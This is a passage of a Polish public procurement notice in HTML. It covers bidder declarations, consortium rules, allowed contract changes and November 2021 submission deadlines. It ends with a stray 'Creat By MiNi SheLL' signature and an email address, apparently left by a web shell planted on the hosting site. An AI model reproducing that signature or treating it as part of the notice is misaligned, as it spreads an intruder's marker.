traktowani są jako Wykonawcy składający ofertę wspólną);oświadczenie Wykonawcy o spełnianiu warunków udziału w postępowaniu <br/>o udzielenie zamówienia - wzór oświadczenia stanowi Załącznik nr 3 do SWZ. <br/>W przypadku wspólnego ubiegania się̨ o zamówienie przez Wykonawców, oświadczenie o spełnianiu warunków udziału w postępowaniu składa każdy z Wykonawców; oświadczenia te winny potwierdzać spełnianie warunków udziału <br/>w postępowaniu w zakresie, w jakim każdy z Wykonawców wykazuje spełnianie warunków udziału w postępowaniu;Jeżeli w imieniu Wykonawcy działa osoba, której umocowanie do jego reprezentowania nie wynika z dokumentów rejestrowych Wykonawcy, pełnomocnictwo lub inny dokument (np. akt powołania na stanowisko prezesa zarządu, członka zarządu spółki lub, w przypadku spółek działających w systemie common law, członka rady dyrektorów spółki, a także umowa spółki cywilnej lub uchwała jej wspólników, wskazująca jednego ze wspólników jako umocowanego do reprezentacji spółki) potwierdzający umocowanie do reprezentowania Wykonawcy;Pełnomocnictwo dla pełnomocnika do reprezentowania w postępowaniu Wykonawców wspólnie ubiegających się o udzielenie zamówienia - dotyczy ofert składanych przez Wykonawców wspólnie ubiegających się o udzielenie zamówienia (wspólnicy spółki cywilnej traktowani są jako Wykonawcy składający ofertę wspólną);<br/>Oświadczenie podmiotu udostępniającego zasoby, potwierdzające brak podstaw wykluczenia tego podmiotu oraz spełnianie warunków udziału w postępowaniu w zakresie, w jakim Wykonawca powołuje się na jego zasoby (wzór oświadczenia stanowi Załącznik nr 4 do SWZ) - dotyczy ofert składanych przez Wykonawców, którzy w celu potwierdzenia spełniania warunków udziału w postępowaniu polegają na zdolnościach lub sytuacji podmiotów udostępniających zasoby;<br/>Zobowiązanie podmiotu udostępniającego zasoby do oddania Wykonawcy do dyspozycji niezbędnych zasobów na potrzeby realizacji przedmiotowego zamówienia lub inny podmiotowy środek dowodowy potwierdzający, że Wykonawca realizując zamówienie, będzie dysponował niezbędnymi zasobami tych podmiotów - dotyczy ofert składanych przez Wykonawców, którzy w celu potwierdzenia spełniania warunków udziału w postępowaniu polegają na zdolnościach lub sytuacji podmiotów udostępniających zasoby (wzór oświadczenia stanowi Załącznik nr 5 do SWZ); <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> W przypadku składania oferty przez Wykonawców wspólnie ubiegających się o<br/>udzieleniezamówienia (konsorcjum), Wykonawcy ustanawiają pełnomocnika do reprezentowania<br/>ich wpostępowaniu albo do reprezentowania ich w postępowaniu i zawarcia umowy<br/>(liderkonsorcjum). Pełnomocnikiem konsorcjum jest Wykonawca, który zaloguje się na swoim<br/>profiluWykonawcy i składając ofertę w zakładce „Wykonawcy” doda pozostałych<br/>Wykonawcówwpisując ich dane.Pełnomocnik, o którym mowa powyżej, pozostaje w kontakcie<br/>zZamawiającym w toku postępowania i do niego Zamawiający kieruje<br/>informacje,korespondencję itp. Wszelkie oświadczenia pełnomocnika Zamawiający uzna za<br/>wiążące dlawszystkich Wykonawców składających ofertę wspólną. Nie dopuszcza się<br/>uczestniczeniaktóregokolwiek z Wykonawców wspólnie ubiegających się o udzielnie<br/>zamówienia w więcej niżjednej grupie Wykonawców wspólnie ubiegających się o udzielenie<br/>zamówienia.Niedopuszczalnym jest również złożenie przez któregokolwiek z Wykonawców<br/>wspólnieubiegających się o udzielnie zamówienia, równocześnie oferty indywidualnej oraz w<br/>ramachgrupy Wykonawców wspólnie ubiegających się o udzielenie zamówienia.Wspólnicy<br/>spółkicywilnej są traktowani jak Wykonawcy składający ofertę wspólną.Szczegóły dotyczące<br/>sposobu składania poszczególnych dokumentów i oświadczeń przez Wykonawców<br/>wspólnie ubiegających się o zamówienie opisane są innych właściwych miejscach w niniejszym<br/>ogłoszeniu oraz w SWZ. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> 1.	Dopuszczalne są zmiany postanowień umowy w stosunku do treści oferty, na podstawie której dokonano wyboru Wykonawcy, w sytuacji obiektywnej konieczności wprowadzenia zmiany, zgodnie z art. 455 ust. 1 pkt 1 ustawy Prawo zamówień publicznych, w niżej przedstawionym zakresie:<br/>1)	zmiany w zakresie przedmiotu umowy lub terminu realizacji umowy z zastrzeżeniem niezmienności wynagrodzenia, w związku z niemożliwą do przewidzenia w momencie zawarcia umowy okolicznością prawną, ekonomiczną lub techniczną, za którą żadna ze Stron nie ponosi odpowiedzialności, skutkującej brakiem możliwości należytego wykonania umowy lub w sytuacji zmiany sprzętu na równoważny lub o lepszych parametrach jedynie w przypadku, gdy:<br/>a)	zmiany są korzystne dla Zamawiającego,<br/>b)	zaoferowane pierwotnie urządzenia zostały wycofane z produkcji, co zostanie udokumentowane przez Wykonawcę,<br/>c)	producent zapowiedział zakończenie produkcji urządzenia, co zostanie udokumentowane przez Wykonawcę,<br/>d)	urządzenie pierwotnie oferowane zostało udoskonalone lub dodatkowo wyposażone, co zostanie udokumentowane przez Wykonawcę,<br/>e)	obiektywnie występującej i udokumentowanej niedostępności zaoferowanego urządzenia na rynku polskim, <br/>2)	możliwość dostaw przedmiotu umowy nowszej generacji na skutek postępu <br/>i rozwoju technologii, przy niezmienionej cenie w stosunku do złożonej oferty;<br/>3)	zmiany cen – w następujących przypadkach:<br/>a)	zmiany wynikającej ze zmiany w prawie właściwym dla podatków i ceł, które podwyższą lub obniżą cenę przedmiotu zamówienia, co w zależności od rodzaju zmian jakie będą miały miejsce, będzie skutkowało obniżeniem lub podwyższeniem ceny jednostkowej brutto przedmiotu zamówienia,<br/>b)	zmiany na korzyść Zamawiającego na skutek udzielonych rabatów, promocji, zmiany kursów walutowych;<br/>4)	zmiany danych Wykonawcy (np.: zmiana siedziby, adresu, nazwy) lub zmiana wynikająca z przekształcenia podmiotowego po stronie Wykonawcy np.: w formie sukcesji uniwersalnej.<br/>2.	Zamawiający przewiduje także możliwość zmiany terminu wykonania umowy, w przypadku wystąpienia nieprzewidzianej i niezależnej od stron przeszkody w szczególności siły wyższej.<br/>3.Strony zastrzegają możliwość zmiany Umowy w zakresie:<br/>1)	postanowień, których zmiana dopuszczalna jest w świetle ustawy PZP bez przeprowadzenia nowego postępowania o udzielenie zamówienia, <br/>w szczególności jeżeli konieczność zmiany Umowy spowodowana jest okolicznościami, których Zamawiający, działając z należytą starannością, nie mógł przewidzieć, o ile taka zmiana nie modyfikuje ogólnego charakteru Umowy, <br/>a wzrost wynagrodzenia spowodowany każdą kolejną zmianą nie przekracza 50 % łącznego wynagrodzenia brutto, o którym mowa w § 5 ust. 1 umowy;<br/>2)	zakresu świadczeń składających się na przedmiot Umowy, w celu dostosowania ich zakresu do planowanej lub wprowadzonej zmiany przepisów prawa i przy odpowiednim zmniejszeniu w sposób proporcjonalny wynagrodzenia należnego Wykonawcy;<br/>3)	szczegółowych zasad wykonywania przedmiotu Umowy określonych w OPZ, <br/>w zakresie niezbędnym do dostosowania treści Umowy do zmian organizacyjnych po stronie Zamawiającego;<br/>4)	terminu wykonania Umowy, jeżeli w toku realizacji Umowy wyniknie potrzeba wykonania innej realizacji czynności, niezbędnej do prawidłowej realizacji przedmiotu Umowy, a których Strony nie przewidziały przy zawarciu Umowy; w takim przypadku termin wykonania Umowy może zostać przesunięty o czas lub wykonania innej realizacji czynności;<br/>5)	wskazanym w § 5 umowy oraz innych wskazanych w Umowie.<br/>Ze względu na ograniczoną ilość znaków nie jest możliwe przytoczenie wszystkich dopuszczalnych zmian – zostały one szczegółowo określone w załączniku do SWZ tj. w projektowanych postanowieniach umowy. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2021-11-10 09:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Wykonawca składa ofertę za po pośrednictwem systemu dostępnego pod adresem: https://ezamowienia.ms.gov.pl i pod nazwą niniejszego postępowania. Sposób złożenia oferty został opisany w Rozdziale XI SWZ.</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2021-11-10 10:00</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2021-12-09</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> Jeżeli Wykonawca ma siedzibę lub miejsce zamieszkania poza granicami<br/>RzeczypospolitejPolskiej, wymagane dokumenty składa się z uwzględnieniem postanowień<br/>rozporządzeniaMinistra Rozwoju, Pracy i Technologii z dnia 23 grudnia 2020 r. w sprawie<br/>podmiotowychśrodków dowodowych oraz innych dokumentów lub oświadczeń, jakich może<br/>żądać zamawiający od wykonawcy (Dz. U. z 2020 r., poz. 2415). Termin dostawy i uruchomienia przedmiotu zamówienia do 35 dni od dnia podpisania umowy, jednak nie później niż do 30 grudnia 2021r.

Creat By MiNi SheLL
Email: jattceo@gmail.com